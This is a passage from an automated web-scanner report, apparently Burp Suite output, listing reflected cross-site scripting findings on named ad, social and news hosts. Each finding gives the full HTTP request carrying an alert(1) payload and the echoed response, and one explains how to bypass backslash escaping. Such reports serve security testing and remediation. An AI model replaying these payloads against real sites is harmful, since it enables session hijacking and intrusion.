Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:59 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 12 May 2011 13:29:59 GMT
Content-Length: 1323

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<!-- NO AD TEXT: _QUERY_STRING="CELT=ifc&BRAND=2&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=130381cf86--><a>0abcf34b1c3" _REQ_NUM="0" -->
...[SNIP]...
2.109. http://mads.zdnet.com/mac-ad [ADREQ&beacon parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.zdnet.com
Path:   /mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload 8d698<a>ee8bfb9666e was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=2&NCAT=6037%3A13616%3A&PTYPE=2100&CID=207595&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=95313175&ADREQ&beacon=18d698<a>ee8bfb9666e&cookiesOn=1 HTTP/1.1
Host: mads.zdnet.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:30:30 GMT
Server: Apache/2.2
Content-Length: 454
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Thu, 12 May 2011 13:30:30 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=2&NCAT=6037%3A13616%3A&PTYPE=2100&CID=207595&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=95313175&ADREQ&beacon=18d698<a>ee8bfb9666e&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='1869889666' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c13-ad-xw4.cnet.com::1287985472
...[SNIP]...
2.110. http://mads.zdnet.com/mac-ad [PAGESTATE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.zdnet.com
Path:   /mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e083'%3balert(1)//f482dca7251 was submitted in the PAGESTATE parameter. This input was echoed as 9e083';alert(1)//f482dca7251 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=9e083'%3balert(1)//f482dca7251&SITE=2&NCAT=6037%3A13616%3A&PTYPE=2100&CID=207595&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=95313175&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.zdnet.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:29 GMT
Server: Apache/2.2
Content-Length: 233
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Thu, 12 May 2011 13:29:29 GMT

/* MAC ad */<!-- no beacon mappings defined -->;window.CBSI_PAGESTATE='9e083';alert(1)//f482dca7251';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c13-ad-xw7.cnet.com::1711409472 2011.05.12.13.29.29 *//* MAC T 0.0.0.0 */
2.111. http://mads.zdnet.com/mac-ad [SITE parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.zdnet.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload cfcb3<a>8a75e829cdc was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=2cfcb3<a>8a75e829cdc&NCAT=6037%3A13616%3A&PTYPE=2100&CID=207595&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=95313175&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.zdnet.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:35 GMT
Server: Apache/2.2
Content-Length: 497
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Thu, 12 May 2011 13:29:35 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=2cfcb3<a>8a75e829cdc&NCAT=6037%3A13616%3A&PTYPE=2100&CID=207595&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=95313175&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='23875829' PTYPE=
...[SNIP]...
2.112. http://offers-service.cbsinteractive.com/offers/script.sc [offerId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers-service.cbsinteractive.com
Path:   /offers/script.sc

Issue detail

The value of the offerId request parameter is copied into the HTML document as plain text between tags. The payload 43138<script>alert(1)</script>b34b7ff49eb was submitted in the offerId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /offers/script.sc?offerId=10343138<script>alert(1)</script>b34b7ff49eb HTTP/1.1
Host: offers-service.cbsinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=90898760.1303940884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=90898760.1302257195.1303940884.1303940884.1303940884.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 89
Date: Thu, 12 May 2011 13:28:31 GMT

// Offer id 10343138<script>alert(1)</script>b34b7ff49eb does not exists or is not ACTIVE
2.113. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 76cc7%0aalert(1)//24965fd8f38 was submitted in the url parameter. This input was echoed as 76cc7
alert(1)//24965fd8f38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml76cc7%0aalert(1)//24965fd8f38&container=peoplesense&parent=http://orangeorb.blogspot.com/&mid=0&view=profile&libs=google.blog&d=0.558.7&lang=en&country=US&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22Share+it%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23ffffff%22,%22ENDCAP_LINK_COLOR%22:%22%23ffc619%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%23ffc619%22,%22CONTENT_TEXT_COLOR%22:%22%23ffffff%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%23ffc619%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23000000%22,%22CONTENT_HEADLINE_COLOR%22:%22%23050c10%22,%22FONT_FACE%22:%22normal+normal+20px+Arial,+Tahoma,+Helvetica,+FreeSans,+sans-serif;%22%7D%7D&communityId=09528749658452737714&caller=http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html HTTP/1.1
Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209791819.1303087791.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=209791819.444546987.1303087791.1303087791.1304097769.2

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 13:33:03 GMT
Expires: Thu, 12 May 2011 13:33:03 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 116

Unable to retrieve spec for http://fcgadgets.appspot.com/spec/shareit.xml76cc7
alert(1)//24965fd8f38. HTTP error 400
2.114. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload ef311%0aalert(1)//395ed2543b7 was submitted in the url parameter. This input was echoed as ef311
alert(1)//395ed2543b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/members.xmlef311%0aalert(1)//395ed2543b7&container=peoplesense&parent=http://orangeorb.blogspot.com/&mid=1&view=profile&libs=google.blog&d=0.558.7&lang=en&country=US&communityId=09528749658452737714&caller=http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html HTTP/1.1
Host: r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 13:33:04 GMT
Expires: Thu, 12 May 2011 13:33:04 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 126

Unable to retrieve spec for http://www.google.com/friendconnect/gadgets/members.xmlef311
alert(1)//395ed2543b7. HTTP error 400
2.115. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtb50.doubleverify.com
Path:   /rtb.ashx/verifyc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a3d0b<script>alert(1)</script>013717e0c3d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rtb.ashx/verifyc?ctx=741233&cmp=5362797&plc=61693702&sid=953446&num=5&ver=2&dv_url=http%3A//cdn-bpx.a9.com/amzn/iframe.html%3Fp%3D281%3Blast%3D1094%3Br%3Da834682&callback=__verify_callback_828489752952a3d0b<script>alert(1)</script>013717e0c3d HTTP/1.1
Host: rtb50.doubleverify.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/84483/219801/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Thu, 12 May 2011 13:33:54 GMT
Connection: close
Content-Length: 74

__verify_callback_828489752952a3d0b<script>alert(1)</script>013717e0c3d(2)
2.116. http://services.digg.com/1.0/endpoint [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.digg.com
Path:   /1.0/endpoint

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6afa2<script>alert(1)</script>f2e9a63b104 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1.0/endpoint?method=story.getAll&link=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html&type=javascript&callback=gig_pc_digg_1305206920623_067839310271665456afa2<script>alert(1)</script>f2e9a63b104 HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 200 OK
Content-Length: 172
X-RateLimit-Current: 54
Etag: "67882ee11f838b332291892eee8b6df3bb578777"
Server: TornadoServer/0.1
Content-Type: text/javascript
X-RateLimit-Max: 5000
X-RateLimit-Reset: 3488

gig_pc_digg_1305206920623_067839310271665456afa2<script>alert(1)</script>f2e9a63b104({
"count": 0,
"timestamp": 1305207035,
"total": 0,
"stories": []
});
2.117. http://services.digg.com/1.0/endpoint [method parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.digg.com
Path:   /1.0/endpoint

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 9e48c<script>alert(1)</script>9acc52f72d6 was submitted in the method parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1.0/endpoint?method=story.getAll9e48c<script>alert(1)</script>9acc52f72d6&link=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html&type=javascript&callback=gig_pc_digg_1305206920623_06783931027166545 HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 403 Forbidden
Content-Length: 221
X-RateLimit-Current: 37
Server: TornadoServer/0.1
Content-Type: text/javascript
X-RateLimit-Max: 5000
X-RateLimit-Reset: 3511

gig_pc_digg_1305206920623_06783931027166545({
"status": 403,
"timestamp": 1305207012,
"message": "No such method 'story.getAll9e48c<script>alert(1)</script>9acc52f72d6' on version 1.0",
"code": 1052
});
2.118. http://services.digg.com/1.0/endpoint [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.digg.com
Path:   /1.0/endpoint

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9033a<script>alert(1)</script>25ba0b9de6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1.0/endpoint?method=story.getAll&link=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html&type=javascript&callback=gig_pc_digg_1305206920623_06783931027166545&9033a<script>alert(1)</script>25ba0b9de6c=1 HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 403 Forbidden
Content-Length: 194
X-RateLimit-Current: 84
Server: TornadoServer/0.1
Content-Type: text/javascript
X-RateLimit-Max: 5000
X-RateLimit-Reset: 3452

gig_pc_digg_1305206920623_06783931027166545({
"status": 403,
"timestamp": 1305207071,
"message": "Unknown argument 9033a<script>alert(1)</script>25ba0b9de6c",
"code": 1001
});
2.119. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [bullet parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mysuburbanlife.com
Path:   /ROP/portablerop.aspx

Issue detail

The value of the bullet request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10439\'%3balert(1)//79f264c7f46 was submitted in the bullet parameter. This input was echoed as 10439\\';alert(1)//79f264c7f46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ROP/portablerop.aspx?wrap=5&pop=m&advlist=true&bullet=blue10439\'%3balert(1)//79f264c7f46&title=Advertisers&viewmore=View%20more%20%3E&titlelink=true&track=Adv_List HTTP/1.1
Host: shop.mysuburbanlife.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:48 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: WS6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68549

document.write('<script type="text/javascript" src="http://shop.mysuburbanlife.com/content/pops.js"></script><link rel="stylesheet" type="text/css" href="http://shop.mysuburbanlife.com/content/pops.cs
...[SNIP]...
<div class="t-p t-tn &#xD;&#xA;                    t-bg5 &#xD;&#xA;                    t-bullet-blue10439\\';alert(1)//79f264c7f46">
...[SNIP]...
2.120. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mysuburbanlife.com
Path:   /ROP/portablerop.aspx

Issue detail

The value of the title request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d59e5\'%3balert(1)//c310a5bf213 was submitted in the title parameter. This input was echoed as d59e5\\';alert(1)//c310a5bf213 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ROP/portablerop.aspx?wrap=5&pop=m&advlist=true&bullet=blue&title=Advertisersd59e5\'%3balert(1)//c310a5bf213&viewmore=View%20more%20%3E&titlelink=true&track=Adv_List HTTP/1.1
Host: shop.mysuburbanlife.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:01 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: WS6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68609

document.write('<script type="text/javascript" src="http://shop.mysuburbanlife.com/content/pops.js"></script><link rel="stylesheet" type="text/css" href="http://shop.mysuburbanlife.com/content/pops.cs
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/" title="Click to view more Advertisersd59e5\\';alert(1)//c310a5bf213" target="">
...[SNIP]...
2.121. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [track parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mysuburbanlife.com
Path:   /ROP/portablerop.aspx

Issue detail

The value of the track request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6be1a\'%3balert(1)//b579f80b78c was submitted in the track parameter. This input was echoed as 6be1a\\';alert(1)//b579f80b78c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ROP/portablerop.aspx?wrap=5&pop=m&advlist=true&bullet=blue&title=Advertisers&viewmore=View%20more%20%3E&titlelink=true&track=Adv_List6be1a\'%3balert(1)//b579f80b78c HTTP/1.1
Host: shop.mysuburbanlife.com
Proxy-Connection: keep-alive
